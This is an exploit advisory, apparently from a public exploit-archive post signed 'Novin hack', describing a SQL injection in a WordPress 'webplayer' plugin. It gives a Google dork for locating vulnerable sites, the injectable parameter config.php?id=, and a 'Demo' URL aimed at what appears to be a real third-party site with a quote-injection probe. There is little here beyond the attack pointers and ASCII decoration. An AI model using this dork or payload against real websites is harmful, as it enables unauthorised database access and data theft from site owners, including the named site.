WordPress Webplayer Player third party plugin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
d69cd4bc562251e4c95062dd6d91dc522ad3027613df830d537ee3bf94f409e3
((|))((|)) ((|)) |)| (|)| |)
((|)) ***********************
((|)) *********************
* ((|)) * *
*0* ((|)) * In the name of iran *
* ((|)) * *
-|- ((|)) *******************
| ((|)) *********
((|))((|))((|))################((|))########################((|))
# Exploit Title: Wordpress webplayer-plugin/ Theme SQL Injection ((|))
# Google Dork: inurl:wp-content/plugins/webplayer/config.php?id= ((|))
# Exploit Author: Novin hack #
# Category: Web Application #
# Tested on: Windows 7 #
###############################((|))#############################
#******************************((|))****************************#
#* Location: http://site.com/wp-content/ #
#* /plugins/webplayer/config.php?id=[SQLi] #
#* #
#* Demo: http://www.thedreamcometrue.com/wp-content/plugins/ #
#* webplayer/config.php?id=null' #
#******************************((|))****************************#
#******************************((|))****************************#
#******************************((|))****************************#
#* ***************** #
#* * * #
#* Greetz to: * Arash.F * #
#* * * #
#* ***************** #
#* #
#*
#* #
#*
#* #
#*
#* #
#*
#* #
#*
#* #
#***************************************************************
#*###############################################################